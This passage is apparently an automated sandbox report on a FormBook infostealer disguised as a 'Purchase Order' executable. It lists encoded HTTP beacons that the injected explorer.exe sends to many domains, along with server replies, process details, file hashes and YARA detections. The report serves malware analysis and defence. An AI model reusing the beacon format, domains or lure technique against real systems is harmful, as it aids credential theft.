                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        11192.168.2.7497643.134.22.6380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:08:21.799002886 CET5430OUTGET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.happinestbuilders.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:08:21.912847042 CET5431INHTTP/1.1 404 Not Found
                                                                        Date: Fri, 20 Nov 2020 10:08:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 153
                                                                        Connection: close
                                                                        Server: nginx/1.16.1
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        12192.168.2.74976552.58.78.1680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:08:26.980870962 CET5432OUTGET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.hemparcade.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:08:26.997565985 CET5432INHTTP/1.1 410 Gone
                                                                        Server: openresty/1.13.6.2
                                                                        Date: Fri, 20 Nov 2020 10:07:50 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 68 65 6d 70 61 72 63 61 64 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 61 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 68 65 6d 70 61 72 63 61 64 65 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='5; url=http://www.hemparcade.com/' />a </head>9 <body>3a You are being redirected to http://www.hemparcade.coma </body>8</html>0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.749752160.153.136.380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:31.979074955 CET5366OUTGET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.heartandcrowncloset.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:32.004002094 CET5366INHTTP/1.1 302 Found
                                                                        Connection: close
                                                                        Pragma: no-cache
                                                                        cache-control: no-cache
                                                                        Location: /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.749753194.35.122.22680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:38.803448915 CET5367OUTGET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.fahufu.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:38.979562044 CET5368INHTTP/1.1 200 OK
                                                                        Date: Fri, 20 Nov 2020 10:07:38 GMT
                                                                        Server: Apache
                                                                        Upgrade: h2
                                                                        Connection: Upgrade, close
                                                                        Vary: Accept-Encoding
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 1.0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        4192.168.2.749754104.253.79.7180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:44.378768921 CET5369OUTGET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.the-gongs.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:44.546214104 CET5370INHTTP/1.1 404 Not Found
                                                                        Date: Fri, 20 Nov 2020 10:07:44 GMT
                                                                        Server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                        Last-Modified: Wed, 11 Nov 2020 11:47:08 GMT
                                                                        ETag: "844-5b3d35aea7a9c"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 2116
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=GB2312
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 67 62 32 33 31 32 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 68 74 6d 6c 2c 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 39 35 25 3b 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 66 33 38 35 34 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b 69 74 2d 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 63 65 6e 74 65 72 20 65 6c 6c 69 70 73 65 2c 20 23 30 61 32 65 33 38 20 30 25 2c 20 23 30 30 30 30 30 30 20 37 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 2c 20 23 30 61 32 65 33 38 20 30 25 2c 20 23 30 30 30 30 30 30 20 37 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 31 30 30 25 3b 7d 70 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 7d 23 63 6c 6f 63 6b 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 68 61 72 65 20 54 65 63 68 20 4d 6f 6e 6f 27 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 35 30 25 3b 74 6f 70 3a 20 35 30 25 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 63 6f 6c 6f 72 3a 20 23 64 61 66 36 66 66 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 32 30 70 78 20 23 30 61 61 66 65 36 2c 20 30 20 30 20 32 30 70 78 20 72 67 62 61 28 31 30 2c 20 31 37 35 2c 20 32 33 30 2c 20 30 29 3b 7d 23 63 6c 6f 63 6b 20 2e 74 69 6d 65 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 70 61 64 64 69 6e 67 3a 20 35 70 78 20 30 3b 7d 23 63 6c 6f 63 6b 20 2e 64 61 74 65 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 2e 31 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 7d 23 63 6c 6f 63 6b 20 2e 74 65 78 74 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20
                                                                        Data Ascii: <!doctype html><html><head><meta charset="gb2312"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimum-scale=1.0, maximum-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="format-detection" content="telephone=no"><title>404</title><style>html, body{height:95%;}body{background: #0f3854;background: -webkit-radial-gradient(center ellipse, #0a2e38 0%, #000000 70%);background: radial-gradient(ellipse at center, #0a2e38 0%, #000000 70%);background-size: 100%;}p{margin:0;padding:0;}#clock{font-family: 'Share Tech Mono', monospace;color: #ffffff;text-align: center;position: absolute;left: 50%;top: 50%;-webkit-transform: translate(-50%, -50%);transform: translate(-50%, -50%);color: #daf6ff;text-shadow: 0 0 20px #0aafe6, 0 0 20px rgba(10, 175, 230, 0);}#clock .time{letter-spacing: 0.05em;font-size: 60px;padding: 5px 0;}#clock .date{letter-spacing:0.1em;font-size:15px;}#clock .text{letter-spacing:
                                                                        Nov 20, 2020 11:07:44.546289921 CET5371INData Raw: 30 2e 31 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 30 3b 7d 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72
                                                                        Data Ascii: 0.1em;font-size:12px;padding:20px 0 0;}</style><script type="text/javascript" src="time.js"></script></head><body><div id="clock"> <p class="date">...404 error page...</p> <p class="time">{{ time }}</p> <p class="text">{


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        5192.168.2.74975635.246.6.10980C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:49.679070950 CET5395OUTGET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.shopnicknaks.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:49.761483908 CET5396INHTTP/1.1 301 Moved Permanently
                                                                        Date: Fri, 20 Nov 2020 10:07:49 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        location: https://www.shopnicknaks.com/igqu?7nExDDz=93%2FRz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ%3D%3D&znedzJ=zZ08lr
                                                                        x-wix-request-id: 1605866869.73454800764115109
                                                                        Age: 0
                                                                        Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                                        Cache-Control: no-cache
                                                                        Expires: -1
                                                                        X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgSFlZwT1h+4EK4tuzq33cp,2d58ifebGbosy5xc+FRaloPX4ngKfQM8fEHbwELHijl2HyxYZMvqhoRodhfrjmMmWIHlCalF7YnfvOr2cMPpyw==,Nlv1KFVtIvAfa3AK9dRsI891F5cPV4/7uVPnrpzkrLQfbJaKSXYQ/lskq2jK6SGP,2UNV7KOq4oGjA5+PKsX47NdwL56oCSUGh+LISE2KX3A=,qquldgcFrj2n046g4RNSVLBEueY9AnibOH2EZLjRrdE=,Ts+7R/4FijtA6c9psi3FQGZDSpRGFXLWKPmpDzjzFFOTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9n3wTMzaU7zAZzBAj7gVU/QH0ckLmbyjm6dEUakZt5J0lud4WLlKsLIaRlCjaOj8vGQ2Otd3B2C27oTTIAKJtQ==
                                                                        Server: Pepyaka/1.19.0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        6192.168.2.749758185.201.11.12680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:54.966870070 CET5412OUTGET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.sweetbasilmarketing.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:55.281188011 CET5413INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        X-Powered-By: PHP/7.2.34
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: http://sweetbasilmarketing.com/igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr
                                                                        X-Litespeed-Cache: miss
                                                                        Content-Length: 0
                                                                        Date: Fri, 20 Nov 2020 10:07:55 GMT
                                                                        Server: LiteSpeed


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        7192.168.2.74975952.71.133.13080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:08:00.453313112 CET5415OUTGET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.justsoldbykristen.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:08:00.556266069 CET5416INHTTP/1.1 301 Moved Permanently
                                                                        Server: openresty/1.17.8.2
                                                                        Date: Fri, 20 Nov 2020 10:08:00 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 175
                                                                        Connection: close
                                                                        Location: https://www.justsoldbykristen.com/igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        8192.168.2.74976013.226.173.8080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:08:05.674489975 CET5416OUTGET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.ariasu-nakanokaikei.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:08:05.691483021 CET5417INHTTP/1.1 301 Moved Permanently
                                                                        Server: CloudFront
                                                                        Date: Fri, 20 Nov 2020 10:08:05 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 183
                                                                        Connection: close
                                                                        Location: https://www.ariasu-nakanokaikei.com/igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr
                                                                        X-Cache: Redirect from cloudfront
                                                                        Via: 1.1 a7d79448ea7ebb4dc0f6ccd1869d1444.cloudfront.net (CloudFront)
                                                                        X-Amz-Cf-Pop: MXP64-C3
                                                                        X-Amz-Cf-Id: PiI-7O_5hgynQNqcUEPysWt8N7YtagWkWw-rfcfszvXMzZkpJvTNCw==
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        9192.168.2.749761103.224.182.24280C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:08:11.059438944 CET5419OUTGET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.realitytvstockwatch.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:08:11.264870882 CET5419INHTTP/1.1 302 Found
                                                                        Date: Fri, 20 Nov 2020 10:08:11 GMT
                                                                        Server: Apache/2.4.25 (Debian)
                                                                        Set-Cookie: __tad=1605866891.2635384; expires=Mon, 18-Nov-2030 10:08:11 GMT; Max-Age=315360000
                                                                        Location: http://ww25.realitytvstockwatch.com/igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr&subid1=20201120-2108-1134-9a4d-df9dc2e636a2
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=UTF-8


                                                                        Code Manipulations

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: Purchase Order 40,7045$.exe PID: 5468 Parent PID: 5664

                                                                        General

                                                                        Start time:11:06:24
                                                                        Start date:20/11/2020
                                                                        Path:C:\Users\user\Desktop\Purchase Order 40,7045$.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
                                                                        Imagebase:0x7fffae0c0000
                                                                        File size:369664 bytes
                                                                        MD5 hash:4142C1713DA2F4F94BEC71BFED46587B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: Purchase Order 40,7045$.exe PID: 4392 Parent PID: 5468

                                                                        General

                                                                        Start time:11:06:24
                                                                        Start date:20/11/2020
                                                                        Path:C:\Users\user\Desktop\Purchase Order 40,7045$.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\Purchase Order 40,7045$.exe
                                                                        Imagebase:0x7fffae0c0000
                                                                        File size:369664 bytes
                                                                        MD5 hash:4142C1713DA2F4F94BEC71BFED46587B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: explorer.exe PID: 3292 Parent PID: 4392

                                                                        General

                                                                        Start time:11:06:27
                                                                        Start date:20/11/2020
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff662bf0000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: ipconfig.exe PID: 6420 Parent PID: 3292

                                                                        General

                                                                        Start time:11:06:39
                                                                        Start date:20/11/2020
                                                                        Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                        Imagebase:0x140000
                                                                        File size:29184 bytes
                                                                        MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
